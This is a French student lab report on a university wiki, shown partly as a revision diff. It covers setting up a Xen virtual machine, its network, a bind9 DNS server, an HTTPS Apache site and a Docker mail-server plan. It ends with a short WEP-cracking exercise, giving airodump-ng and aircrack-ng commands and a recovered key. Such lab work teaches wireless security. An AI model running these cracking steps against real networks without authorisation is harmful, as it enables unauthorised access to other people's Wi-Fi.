TP sysres IMA2a5 2017/2018 G3 : Différence entre versions
Ligne 8 : | Ligne 8 : | ||
Voici les différentes commandes nécessaires pour créer la machine virtuelle : | Voici les différentes commandes nécessaires pour créer la machine virtuelle : | ||
xen-create-image --hostname=duvel --dhcp --dir=/usr/local/xen | xen-create-image --hostname=duvel --dhcp --dir=/usr/local/xen | ||
+ | |||
+ | Lorsque notre machine virtuelle a été créée, nous avons mis en place une configuration réseau temporaire (adresse IP du réseau Insecure). Une fois que les collègues ont mis en place ce réseau, nous avons configuré notre réseau final. | ||
+ | Sa nouvelle adresse IP est 193.48.57.165. Voici la configuration réseau du fichier /etc/network/interfaces : | ||
+ | </div> | ||
+ | |||
+ | <div> | ||
+ | //The loopback network interface | ||
+ | auto lo | ||
+ | iface lo inet loopback | ||
+ | |||
+ | // The primary network interface | ||
+ | auto eth0 | ||
+ | iface eth0 inet static | ||
+ | address 193.48.57.165 | ||
+ | netmask 255.255.255.240 | ||
+ | gateway 193.48.57.174 | ||
Ligne 22 : | Ligne 38 : | ||
apt-get install bind9, apache2, docker | apt-get install bind9, apache2, docker | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
.<br>Après avoir acheté un nom de domaine sur gandi.net (duvel.space), nous avons monté le serveur DNS via bind9. Nous avons en premier lieu modifier les fichiers :<br><br></div> | .<br>Après avoir acheté un nom de domaine sur gandi.net (duvel.space), nous avons monté le serveur DNS via bind9. Nous avons en premier lieu modifier les fichiers :<br><br></div> |
Version du 3 décembre 2017 à 19:40
Sommaire
Projet de réseau IMA2A5
Création et configuration de la Machine virtuelle
La machine virtuelle est hébergée sur le serveur cordouan. Voici les différentes commandes nécessaires pour créer la machine virtuelle :
xen-create-image --hostname=duvel --dhcp --dir=/usr/local/xen
Lorsque notre machine virtuelle a été créée, nous avons mis en place une configuration réseau temporaire (adresse IP du réseau Insecure). Une fois que les collègues ont mis en place ce réseau, nous avons configuré notre réseau final. Sa nouvelle adresse IP est 193.48.57.165. Voici la configuration réseau du fichier /etc/network/interfaces :
//The loopback network interface auto lo iface lo inet loopback
// The primary network interface auto eth0 iface eth0 inet static address 193.48.57.165 netmask 255.255.255.240 gateway 193.48.57.174
- apache2 comme serveur web
- docker afin de créer des conteneurs de messagerie
- bind9 pour monter notre serveur DNS
apt-get install bind9, apache2, docker
.
Après avoir acheté un nom de domaine sur gandi.net (duvel.space), nous avons monté le serveur DNS via bind9. Nous avons en premier lieu modifier les fichiers :
</div>
- named.conf.local :
zone "duvel.space" {
type master;
file "/etc/bind/webmail.duvel.space";
// allow-transfer { };
}; - named.conf.options :
dnssec-validation auto;
auth-nxdomain no; # conform to RFC1035
listen-on-v6 { any; }; - webmail.duvel.space :
$TTL 604800
@ IN SOA ns.duvel.space. root.duvel.space. (
3298267243 ; Version
7200 ; Refresh (2h)
3600 ; Retry (1h)
1209600 ; Expire (14j)
259200 ) ; Minimum TTL (3j)
IN NS ns.duvel.space.
IN NS ns6.gandi.net.
ns IN A 193.48.57.165
ns6 IN A 217.70.177.40
Configuration DNS sécurisé
- IN MX 100 ns.duvel.space.
- www IN CNAME ns
La config ssl de apache a aussi été modifier pour avoir un site en https sur le port 443 avec certificat.
<IfModule mod_ssl.c>
<VirtualHost *:443>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
SSLEngine on
SSLCertificateFile /root/duvel.crt
SSLCertificateKeyFile /root/duvel.key
SSLCertificateChainFile /root/GandiStandardSSLCA2.pem
<FilesMatch "\.(cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>
BrowserMatch "MSIE [2-6]" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
BrowserMatch "MSIE [17-9]" ssl-unclean-shutdown
</VirtualHost>
</IfModule>
Nous avons ensuite créé les 2 clefs asymétriques suivantes:
- clef asym clef de zone : Kduvel.space.+005+15754
- clef asym clef d'enregistrement : Kduvel.space.+005+43650
Tâche spécifique: Création d'un serveur mail
L'idée est ici de créer un serveur mail sur notre machine virtuelle à partir de postfix, tout en utilisant des conteneurs correspondants à chaque utilisateur.
Les conteneurs sont créés avec Docker. Pour cela, on récupère une image avec la commande "docker pull debian" et on le créé sur notre machine avec "docker run -i -t debian /bin/bash"
Crack de la clef WEP
- On commence par chercher le point d'accès:
airodump-ng --encrypt wep wlan0mon
- Ensuite on écoute les trames wifi:
airodump-ng -w out -c 4 --essid ***** wlan0mon
- On lance ensuite la commande suivante dans un autre terminal pour trouver la clef, la recherche dure environ 5 minutes. Ce temps est dû au fait que l'on procède par tests (force brute)
aircrack-ng out-01.cap
KEY FOUND! [ 63:32:34:67:4A:3A:51:34:76:25:43:77:3F ] (ASCII: c24gJ:Q4v%Cw? )
- On commence par chercher le point d'accès: